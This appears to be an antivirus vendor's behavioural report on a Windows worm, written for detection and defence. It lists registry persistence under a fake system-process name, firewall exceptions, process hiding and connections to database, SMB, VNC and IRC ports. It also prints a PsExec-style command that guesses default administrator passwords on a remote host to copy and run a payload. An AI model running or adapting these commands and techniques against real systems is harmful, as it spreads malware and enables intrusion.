Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Session Manager Subsystem' = '<LS_APPDATA>\ssms.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<LS_APPDATA>\px.exe' = '<LS_APPDATA>\px.exe:*:Enabled:px.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<LS_APPDATA>\ssms.exe' = '<LS_APPDATA>\ssms.exe:*:Enabled:ssms.exe'
- <LS_APPDATA>\px.exe \\40.149.30.158 -u Administrador -p "" -c -f -d win32x.exe \\40.149.30.158 -u Administrateur -p "" -c -f -d win32x.exe \\40.149.30.158 -u Verwalter -p "" -c -f -d win32x.exe \\40.149.30.158 -u Coordinatore -p "" -c -f -d win32x.exe \\40.149.30.158 -u "Small Business Admin" -p "" -c -f -d win32x.exe \\40.149.30.158 -u Owner -p "" -c -f -d win32x.exe \\40.149.30.158 -u %USERNAME% -p "" -c -f -d win32x.exe \\40.149.30.158 -u admin -p admin -c -f -d win32x.exe \\40.149.30.158 -u User -p "" -c -f -d win32x.exe
- <LS_APPDATA>\wn.exe hide -p ssms.exe
- <LS_APPDATA>\ssms.exe
- <LS_APPDATA>\fp.exe
- <LS_APPDATA>\MSWINSCK.OCX
- <LS_APPDATA>\msvbvm60.dll
- <LS_APPDATA>\ssms.exe
- <LS_APPDATA>\px.exe
- <LS_APPDATA>\wn.exe
- '40.##.188.98':21
- '40.##2.90.62':1433
- '40.##.37.150':3306
- 'ir#.#izon.net':6667
- '40.##9.30.158':445
- '40.##8.157.48':5900
- DNS ASK ir#.#izon.net
- ClassName: 'Shell_TrayWnd' WindowName: ''